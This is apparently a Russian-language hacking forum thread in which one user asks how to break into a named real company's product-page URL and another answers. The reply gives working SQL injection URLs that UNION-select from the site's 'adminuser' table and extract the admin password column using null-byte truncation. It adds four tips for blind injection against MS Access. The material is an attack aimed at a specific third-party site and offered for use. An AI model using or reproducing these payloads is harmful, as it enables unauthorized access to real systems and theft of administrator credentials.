Сообщение от
GhostW
Помогиет кто-нить раскурить эту ссылку... Если не трудно в ЛС... что и как вы сделали... там вроде как MSAccess но с данной СУБД у меня ничего не получается((
Код:
http://www.mooeraudio.com/en/ProductInfo.asp?id=13
Угу. Это MsAccess
_ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,1 11222333444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9+from+adminuser%00
_ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,( select+top+1+cstr([adminpwd])+from+(select+top+1+*+from+(select+top+1+*+from+[adminuser]+order+by+1)+t+order+by+1+desc)t),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+adminuser%00
4 самых важных момента
1) Выборка всегда должна идти из какой-либо таблицы, иначе запрос некорректен
2) Для отсечения зпроса работает только нулл байт %00 или %16
3) Все таблицы/колонки подбираются в слепую, при условии что не доступны сисемные таблички.
4) Для конвертирования получаемых данных в строковый тип используй cstr()